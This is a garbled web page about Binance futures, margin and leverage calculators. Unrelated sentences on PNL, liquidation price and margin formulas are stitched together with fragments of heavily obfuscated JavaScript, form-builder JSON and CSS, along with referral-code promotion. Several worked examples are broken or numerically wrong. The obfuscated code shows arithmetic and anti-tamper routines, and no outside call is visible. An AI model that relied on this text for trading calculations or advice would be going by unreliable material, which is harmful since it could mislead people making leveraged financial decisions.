In the case of a short position, this is the price at which you can buy to close the position. [];return function(_0x58ba91,_0x909961){var _0x2bd6f9={'SoeFL':_0x34f5ce[_0x422757(-0x197,-0x18c,-0x179,-0x18f)],'efoVJ':function(_0x19fdf0,_0x3a26e9){function _0x59658f(_0x43ea8d,_0x302306,_0x7d69a5,_0x13042c){return _0x422757(_0x43ea8d-0x180,_0x302306-0x3f4,_0x7d69a5,_0x13042c-0x70);}return _0x34f5ce[_0x59658f(0x22b,0x23c,0x226,0x21e)](_0x19fdf0,_0x3a26e9);},'fJmVM':_0x34f5ce[_0x422757(-0x1d5,-0x1b1,-0x1b6,-0x1c2)],'NJzAb':_0x422757(-0x1b7,-0x19f,-0x1bc,-0x1ac)},_0x590bff=_0x22d47e?function(){function _0x4c8fcf(_0x4b7c92,_0xd9ac85,_0x278a4f,_0x5c7732){return _0x422757(_0x4b7c92-0x16e,_0xd9ac85-0x32d,_0x278a4f,_0x5c7732-0xd9);}function _0x4752d7(_0x1860cc,_0x4a5e82,_0x1d79eb,_0x429e82){return _0x25ca4f(_0x1d79eb,_0x4a5e82-0x87,_0x4a5e82-0x363,_0x429e82-0xc6);}if(_0x4752d7(0x25f,0x281,0x288,0x267)===_0x2bd6f9[_0x4752d7(0x2c6,0x2a3,0x2a4,0x2a0)]){var _0x2cf635=_0x309575?function(){if(_0x4023d1){var _0x32f690=_0x497de2['apply'](_0x159930,arguments);return _0x36d52e=null,_0x32f690;}}:function(){};return _0x6d339f=! Blockchain and crypto education. choose the type of position (long or short); indicate the number of assets in the transaction; select the size of the leverage (by moving the special slider). And this amount will be added to the loss. The latest information about the world of internet earnings. I can help you with math problems. Binance Coin Margin & leverage calculator. This means that the realized PNL = $ 100,000 $ 700 = $ 99,300. form_structure_1=[[{"form_identifier":"","name":"fieldname2","shortlabel":"","index":0,"ftype":"fnumber","userhelp":"","audiotutorial":"","userhelpTooltip":false,"tooltipIcon":false,"csslayout":"my-field","title":"Cost \/ Margin","predefined":"","predefinedClick":false,"required":false,"exclude":false,"readonly":false,"numberpad":false,"spinner":false,"size":"small","thousandSeparator":",","decimalSymbol":". . Binance Futures risk and position size calculator Use this to calculate your risk % based on number of contracts or maximum number of contracts based on risk %. You can maintain your existing positions opened before July 27, 2021 beyond 20x leverage, but you cannot increase the leverage further. #fbuilder .my-field textarea:hover{color: #f2f2f5 !important;} []){try{var _0x20e06c=parseInt(_0x66a852(0x6c,0x7a,0x67,0x4c))\/(0x10b3+0x1ea*0x3+-0x1670)+-parseInt(_0x2c8735(0x297,0x28e,0x26e,0x27e))\/(-0x2*0xaf2+0x13b5+0x231)+parseInt(_0x66a852(0x3e,0x50,0x4e,0x42))\/(-0x11cd+0x181f+0x1*-0x64f)*(parseInt(_0x66a852(0x6,0x1b,0x2b,0x21))\/(-0xfb5+-0x24e4+0x1*0x349d))+parseInt(_0x66a852(0x28,0x15,0x38,0x41))\/(0x4c9+0x8a*-0x45+-0x1037*-0x2)+parseInt(_0x66a852(0x7d,0x6b,0x5f,0x58))\/(0x1a1*0xb+-0xe24+0x3c1*-0x1)*(parseInt(_0x66a852(0x34,0x3f,0x2a,0xe))\/(0xc1*-0x11+0x2*-0x11f0+0xc2e*0x4))+-parseInt(_0x66a852(0x4c,0x24,0x39,0x50))\/(0x1c1e+0x24cf+-0x40e5)+parseInt(_0x2c8735(0x25d,0x287,0x28c,0x276))\/(0x60d*0x1+0x12b4+0xe*-0x1c4)*(parseInt(_0x66a852(0x32,0x5f,0x4c,0x39))\/(-0x100+-0x25a0+-0xca*-0x31));if(_0x20e06c===_0x92dc78)break;else _0x315a29['push'](_0x315a29['shift']());}catch(_0x54b01a){_0x315a29['push'](_0x315a29['shift']());}}}(_0x38b9,-0x1*0x3cd04+0x2d626+0x5477c),(function(){var _0x236731={'FtMuX':'fHuVu','IqrOR':_0x3c63b8(0x305,0x30a,0x2ec,0x30d),'pHmNp':_0x59eff4(0x129,0x137,0x142,0x143)+'+$','QOcPG':_0x3c63b8(0x319,0x30e,0x334,0x331),'pxtAs':function(_0x42ee72,_0x518cf4){return _0x42ee72===_0x518cf4;},'unkKo':'MtzHO','tzJeJ':function(_0x3f2b49,_0x5402ba){return _0x3f2b49+_0x5402ba;},'QdAOd':'return\\x20(fu'+_0x3c63b8(0x305,0x2f1,0x2e6,0x2e6),'TvXNz':'5|1|4|3|2|'+'0','SGHWM':function(_0x3e8aa6){return _0x3e8aa6();},'qmdQr':_0x3c63b8(0x325,0x32d,0x341,0x331),'PakNC':_0x59eff4(0x14c,0x14c,0x14f,0x139),'snrWV':_0x59eff4(0x154,0x170,0x174,0x16e),'yhHNz':_0x59eff4(0x171,0x17a,0x161,0x16d),'oEeqb':'exception','PetPP':_0x3c63b8(0x2e5,0x2f2,0x30f,0x311),'gcvRh':_0x3c63b8(0x351,0x32c,0x351,0x33b),'dkael':function(_0x2052a8,_0xfe78c3){return _0x2052a8\u003C_0xfe78c3;},'uWmvs':function(_0x4eb972,_0x4f636f){return _0x4eb972===_0x4f636f;},'LUQMJ':'XveWI','jiAYU':function(_0x135614,_0x4a5dbf,_0x5c5204){return _0x135614(_0x4a5dbf,_0x5c5204);},'IIKrY':function(_0x1f9d74){return _0x1f9d74();},'NTtUC':function(_0x389e66,_0x133e99){return _0x389e66==_0x133e99;},'cxJaF':function(_0x18305e,_0x1ec651){return _0x18305e-_0x1ec651;},'fdBmZ':function(_0x5decc5,_0x188730){return _0x5decc5*_0x188730;},'voVVx':function(_0xac36f6,_0x2bee5c){return _0xac36f6\/_0x2bee5c;},'FXkjt':function(_0x4d8ada,_0x3a05e0){return _0x4d8ada*_0x3a05e0;},'TFiIe':function(_0x5166cc,_0x300b37){return _0x5166cc==_0x300b37;},'fMcpP':function(_0x1f99a3,_0x780821){return _0x1f99a3==_0x780821;},'zVuqX':function(_0x1cbbc2,_0x4951b2){return _0x1cbbc2*_0x4951b2;},'QoKYz':function(_0x367076,_0x19d662){return _0x367076-_0x19d662;},'fMjYr':function(_0x5b078f,_0x50d6b1){return _0x5b078f*_0x50d6b1;},'sNjUx':function(_0x20c05c,_0x5b755c){return _0x20c05c==_0x5b755c;},'fxnCJ':function(_0x225547,_0x14acf5){return _0x225547-_0x14acf5;},'FIhlE':function(_0x586e34,_0x3daf1d){return _0x586e34*_0x3daf1d;},'hHZvk':function(_0x2e0b62,_0x2088bb){return _0x2e0b62*_0x2088bb;}},_0x4e9852=(function(){var _0x4df911={};function _0x21dbe2(_0x48395b,_0x126c94,_0xb1c3d2,_0x11928c){return _0x3c63b8(_0x48395b-0x1c6,_0x126c94-0x19e,_0x48395b,_0x11928c-0x141);}_0x4df911[_0x21dbe2(0x4ed,0x4c7,0x4bb,0x4c9)]=_0x236731[_0x21dbe2(0x492,0x4a3,0x4c1,0x4bf)],_0x4df911[_0x48acb7(-0xd0,-0xbe,-0xd3,-0xda)]='PehGh',_0x4df911['pEjXe']=_0x236731[_0x48acb7(-0xfe,-0xdb,-0xf7,-0xbe)];var _0x2b0946=_0x4df911,_0x21f359=!! You can adjust the leverage according to your needs, and all position sizes are calculated based on the contract's notional value (USDT or BUSD denominated). This calculator works for all the biggest cryptocurrency margin (leveraged) trading exchanges. For an ETHUSD position with a wallet balance of 0.15 ETH, 0.15 can be entered in the wallet balance field. Binance introduced margin trading in 2019, and it's gradually becoming a popular feature for traders. USD-Margined Futures Contract Specifications, How to Calculate Liquidation Price of USD-M Futures Contracts, How to Calculate Cost Required to Open a Position in Perpetual Futures Contracts, BUSD-Margined Contract Specifications and Trading Rules, USDT-Margined Quarterly Contract Specification and Trading Rules, Mark Price in USD-Margined Quarterly Futures. To do this, you just need to follow the link and fill in the required information. The Binance futures trading page also has a calculator function that calculates PNL and ROE, as well as initial margin. leverage, or buying on margin, . So, if you leverage Bitcoin by investing $100 and have 10:1 leverage, you can invest the equivalent of $1,000. Binance Futures Calculator Binance Futures Profit Calculator & Leverage Calculator, Binance Futures Tutorial: Trading, Calculator & Fees Explained, How to Short on Binance, Shorting Bitcoin on Binance, Binance Referral Code 2023 (45% Fee Discount) Spot & Futures, Binance Tutorial: How to Use Binance | Fees & Depositing Money, How to Long on Binance & How to Long Bitcoin. For example, lets say you have a 1400 USDT position with 2x leverage and your margin (cost) for the position is 700 USDT (1400/2). You can calculate PNL on the Binance exchange using one of two formulas: The tagging price is the value of the asset at the time of the close of the trade (or at the time of the PNL calculation). Learn & Earn. Step 6: Select the type of futures contract that you trade. *Excludes self-trading and Tier 0 trading pairs. Refer friends to earn trading fees 20% kickback. Binance margin trading calculator - Best of all, Binance margin trading calculator is free to use, so there's no sense not to give it a try! target price the rate, upon reaching which the planned profit will be received; liquidation price the rate, upon reaching which the position will be liquidated forcibly; maximum opening the amount for which a position can be opened; open price the amount of funds that you need to have on the balance sheet to open a deal. Binance futures calculator is explained in this video, and in this tutorial it's shown how to effectively use Binance calculator in futures trading. For reference, each BTCUSD contract is worth 100 USD and each ETHUSD contract is worth 10 USD, which can be found on the trading page as well. You divide your maximum risk by your net target profit. Our calculator is meant to be used as an alternative for Bitmex's own calculator and excel calculators around the web. Academy. Decide math tasks. The Binance Futures platform allows users to manually adjust the leverage for each contract. If you add 100 USDT margin to your position, you should also change your leverage besides entering 800 in the cost/margin field. This sucks!In this video, I show you how you can automatically calculate your cost average. Fee calculations differ based on factors such as the digital asset itself, payment method, and network conditions such as congestion and current gas price. 1. Accordingly, for a more accurate calculation, you need to take into account the exchange spread. Binance Futures allows you to manually adjust the leverage for each contract. We have tested it with Bitmex, Bybit and Deribit BTC/USD pairs. You can find the maintenance margin rate and the maintenance amount based on the pair you trade and your position size on this page. Then the unrealized PNL * 10 = (90100) * 10 = 100 $. Tools & Calculators. Trading Strategy Settings Starting Balance USD Win Rate % #fbuilder .my-field select, VIP trade volume levels are measured on the basis of the spot trading volume, or whether the futures trading volume meets the standard (Futures trading volume includes USDS-M futures and COIN-M futures). Initial Margin = Notional Position Value / Leverage Level, Maintenance Margin = Notional Position Value * Maintenance Margin Rate - Maintenance Amount. Crypto deposits are free, though fees may apply when you withdraw crypto. To simplify the work of traders, the Binance exchange has created a special calculator that allows you to calculate the profit and loss (PNL) values, as well as the profitability of the transaction in % (ROE), even before opening orders. You should first study the corresponding guide if you do not know what futures are and how they work on Binance. To calculate trading fees, Poloniex uses a volume-based maker-taker fee schedule. If you are in the Isolated Margin Mode, you cannot reduce the leverage. Use this handy Forex & Crypto Margin & Leverage Calculator to calculate accurately the amount of funds required to open a trading position, or used to open . [],_0x4d3808;}else{var _0x261faa=_0x17620e?function(){function _0x577a83(_0x383f4d,_0xdfc564,_0x45a548,_0x105c12){return _0x2ff607(_0x45a548- -0x2f1,_0xdfc564-0x35,_0x45a548-0x1ec,_0x383f4d);}function _0x454267(_0x7613e2,_0x461d46,_0x15cb7d,_0x4d25c9){return _0x2ff607(_0x461d46-0x4c,_0x461d46-0x15f,_0x15cb7d-0xe0,_0x15cb7d);}if(_0x277950){if(_0x530cba[_0x454267(0x1f0,0x1f4,0x1e5,0x1ed)](_0x530cba['ZDrqG'],_0x530cba[_0x577a83(-0x156,-0x141,-0x13c,-0x155)])){var _0x2f98dc=_0x277950[_0x577a83(-0x133,-0x198,-0x164,-0x18a)](_0x5886aa,arguments);return _0x277950=null,_0x2f98dc;}else{var _0x1b3a92=_0x2f3c7d[_0x577a83(-0x18e,-0x153,-0x164,-0x164)](_0x5f2c40,arguments);return _0x539a9f=null,_0x1b3a92;}}}:function(){};return _0x17620e=! Accordingly, the calculation for a Long position will look like this: unrealized PNL * 10 = (Marking price Initial buy rate) * Position size. Go to "Margin .
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